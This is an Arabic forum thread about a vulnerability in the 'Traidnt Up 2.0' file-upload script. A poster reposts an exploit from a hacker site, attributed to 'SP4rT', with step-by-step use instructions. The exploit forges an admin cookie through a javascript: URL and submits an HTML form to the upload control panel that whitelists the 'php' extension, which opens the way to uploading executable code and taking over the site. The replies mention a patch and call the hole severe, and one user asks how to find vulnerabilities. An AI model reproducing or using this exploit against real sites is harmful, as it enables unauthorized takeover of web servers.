ثغرة جديدة فى مركز التحميل Traidnt Up version 2.0

ahmedengu

عضو جديد
9 ديسمبر 2008
1,015
0
0
30
مصر
www.g-ara.com
بسم الله
الثغرة لا اعرف جديدة ام قديمة فانا وجدتها فى موقع هكرز
الثغرة
PHP:
html> 
<center> 
<br> 
<br> 
<!-- 
######################################################### 
# 
#    Traidnt Up version 2.0 Add Extension By Pass 
#    Author: SP4rT 
#    Email : SP4rt@Yahoo.coM 
#    DownLoad : http://traidnt.net/vb/showthread.php?t=943260 
#    Downloads : 33712 
# 
#    1.    Enter uploadcp url  
#    2.    java script:document&@#&@#&@#&@#&@#&@#="trupuser=SP4rT;"; 
#    3.    Enter this Page After Edit {script_path} & PosT your Extension . 
# 
######################################################### 
--> 
<form name='traidnt-ext' action='http:/{script_path}/uploadcp/files.php?do=extension&go=add' method='POST'> 
<table border='1' width='450'> 
<tr> 
<td align='center' colspan='2'>Add Extension :</td> 
</tr> 
<tr> 
<td align=center><input type='text' name='exname' value='php'> 
<input type='hidden' name='maxsize' value='1000000000000'> 
<input type='submit' value='   Add Ext   '> 

</td> 
</tr> 
</table>
 
جزاك الله كل خير على الاجابة وانا بالفعل قمت بعمل الترقيع
لكن وجدت الموضوع فى احد مواقع الهكرز و لم يكن محدد تريخ الثغرة
جزاك الله كل خير
 
الثغره جديده اخوى ,
من وقت كتابه موضوع الترقيع هنا بالمنتدى
لانها كانت خطيره جدااا
وسهوله اختراق الموقع كامل سواء مركز التحميل والبقيه ...
 
عفوا ممكن سؤال كيف اقدر اكتشف ثغرات حتى نتلحق عليها ممكن شرح ولو حتى معقد في كيفية اكتشاف